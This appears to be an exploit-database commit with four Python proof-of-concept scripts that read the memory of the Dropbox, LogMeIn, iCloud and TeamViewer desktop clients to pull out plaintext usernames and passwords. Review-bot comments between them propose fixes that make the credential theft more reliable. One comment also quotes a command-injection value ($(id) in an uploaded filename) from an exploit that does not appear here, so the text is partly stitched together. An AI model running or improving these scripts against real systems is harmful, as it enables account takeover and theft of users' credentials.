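Review bot: the root cause shown is the uploaded filename (`files[1]` with `filename="$(id).wav"`) being concatenated unescaped into the `sox` command line that `Process` hands to `proc_open`, yet the patching section only says "adding escapeshellarg to soxshell inputs" and then notes that later versions filter a character list; the remediation should state plainly that a character blacklist is not an adequate fix and that the filename must be escaped, or better replaced by a server-generated name, before it reaches the shell. The title also claims a "partial authenticaion bypass" (sic), but nothing in the text explains why `ajax.php?module=music&command=upload` is reachable without a session; either document it or drop the claim. The `SoxShell.php` excerpt is cut mid-statement (`new Proces.................`) and should be completed or elided cleanly.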

platforms/windows/local/40341.txt Executable file

@ -0,0 +1,242 @@
#####
# Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure
# Tested on Windows Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://www.dropbox.com
# Date 06/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
#####
# Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
# A potential attacker could reveal the supplied username and password in order to gain access to account.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
username = ''
password = ''
found = 0
filename = "Dropbox.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'):
memory_dump.append(process.read(address,100))
for i in range(len(memory_dump)):
email_addr = memory_dump[i].split('email=')[1]
tmp_passwd = memory_dump[i].split('password=')[1]
username = email_addr.split('\x00')[0]
password = tmp_passwd.split('&is_sso_link=')[0]
if username != '' and password !='':
found = 1
print "[+] Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % urllib.unquote_plus(username)
print "[+] Password: %s" % password
if found == 0:
print "[-] Credentials not found! Make sure the client is connected."
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
######################################################################
#####
# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure
# Tested on Windows Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://secure.logmein.com/home/en
# Date 06/09/2016
# Bug Discovery by:
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
#####
# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
# A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
username = ''
password = ''
found = 0
filename = "LMIIgnition.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
memory_dump.append(process.read(address,150))
for i in range(len(memory_dump[0])):
email_addr = memory_dump[i].split('email=')[1]
tmp_passwd = memory_dump[i].split('password=')[1]
username = email_addr.split('&hiddenEmail=')[0]
password = tmp_passwd.split('&rememberMe=')[0]
if username != '' and password !='':
found = 1
print "[+] Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % urllib.unquote_plus(username)
print "[+] Password: %s" % password
break
if found == 0:
print "[-] Credentials not found! Make sure the client is connected."
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
######################################################################
#####
# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit
# Tested on Windows Windows 7 64bit, English
# Vendor Homepage @ https://www.apple.com/
# Product Homepage @ https://support.apple.com/en-us/HT204283
# Date 07/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
#####
# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out.
# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process.
# Funny eh?!
# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account.
#
# Authors are not responsible for any misuse or demage which caused by use of this script code.
# Please use responsibly.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
def b2h(str):
return ''.join(["%02X " % ord(x) for x in str]).strip()
def h2b(str):
bytes = []
str = ''.join(str.split(" "))
for i in range(0, len(str), 2):
bytes.append(chr(int(str[i:i+2], 16)))
return ''.join(bytes)
usr = ''
pwd = ''
found = 0
filename = "iCloud.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "#########################################################################"
print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#"
print "# Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#"
print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
print "#\t\t\tPlease use responsibly.\t\t\t\t#"
print "#########################################################################\r\n"
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
memory_dump.append(process.read(address,50))
try:
str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
usr = h2b(str.split(' 00')[0])
except:
pass
memory_dump = []
for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
memory_dump.append(process.read(address,60))
try:
str = b2h(memory_dump[0]).split('07 00 02 09')[1]
pwd = h2b(str.split(' 00')[0])
except:
pass
if usr != '' and pwd !='':
found = 1
print "[+] iCloud Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % usr
print "[+] Password: %s" % pwd
if found == 0:
print "[-] Credentials not found!"
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
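Review bot: in the LogMeIn script, `for i in range(len(memory_dump[0])):` iterates over the byte length of the first 150-byte read instead of the number of reads; it raises IndexError as soon as `i` exceeds the number of matches without an earlier `break`, and when nothing matched at all (`memory_dump` empty) it raises IndexError on `memory_dump[0]` before the "Credentials not found" branch can run. It should be `range(len(memory_dump))` as in the Dropbox script. Related: both the Dropbox and LogMeIn loops index `split('email=')[1]` and `split('password=')[1]` unconditionally, so a match whose 100/150-byte window does not contain the second marker also throws IndexError; check for the marker first (or wrap the parse in try/except as the iCloud script does) so one bad window does not abort the scan. Style: `if process_pid is not 0` compares by identity and should be `!= 0`. Documentation: the three headers should state the context the PoC needs (it reads another process's memory, so it must run as the same user as the target client or with debug privilege), as the TeamViewer file in this commit does with "There is no need in privilege account access".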


@ -0,0 +1,74 @@
#####
# TeamViewer 11.0.65452 (64 bit) Local Credentials Disclosure
# Tested on Windows 7 64bit, English
# Vendor Homepage @ https://www.teamviewer.com/
# Date 07/09/2016
# Bug Discovered by Alexander Korznikov (https://www.linkedin.com/in/nopernik)
#
# http://www.korznikov.com | @nopernik
#
# Special Thanks to:
# Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/)
# Yakir Wizman (https://www.exploit-db.com/author/?a=1002) | (http://www.black-rose.ml)
#
#####
# TeamViewer 11.0.65452 is vulnerable to local credentials disclosure, the supplied userid and password are stored in a plaintext format in memory process.
# There is no need in privilege account access. Credentials are stored in context of regular user.
# A potential attacker could reveal the supplied username and password automaticaly and gain persistent access to host via TeamViewer services.
#
# Proof-Of-Concept Code:
#####
from winappdbg import Debug, Process, HexDump
import sys
import re
filename = 'TeamViewer.exe'
def memory_search( pid ):
found = []
# Instance a Process object.
process = Process( pid )
# Search for the string in the process memory.
# Looking for User ID:
userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'
for address in process.search_regexp( userid_pattern ):
found += [address]
print 'Possible UserIDs found:'
found = [i[-1] for i in found]
for i in set(found):
print i.replace('\x00','')
found = []
# Looking for Password:
pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'
for address in process.search_regexp( pass_pattern ):
found += [process.read(address[0]-3,16)]
if found:
print '\nPassword:'
if len(found) > 1:
s = list(set([x for x in found if found.count(x) > 1]))
for i in s:
pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0]
print pwd
else:
print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]
return found
debug = Debug()
try:
# Lookup the currently running processes.
debug.system.scan_processes()
# For all processes that match the requested filename...
for ( process, name ) in debug.system.find_processes_by_filename( filename ):
pid = process.get_pid()
memory_search(pid)
finally:
debug.stop()
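Review bot: in `memory_search`, the password branch for `len(found) > 1` keeps only values that occur more than once (`found.count(x) > 1`), so when the regex matches two or more distinct windows that each appear once the script prints the "Password:" header and nothing under it; fall back to printing every distinct candidate when the duplicate filter yields an empty set. `re.findall('[0-9]{4}', ...)[0]` also raises IndexError when a 16-byte window read from `address[0]-3` contains no run of four digits once the NULs are stripped, which aborts the whole search; guard that lookup. Minor: the same `found` list is reused for user IDs (regex match data, `i[-1]`) and then for passwords (raw reads), and only the password list is returned; two names would make the return value clearer.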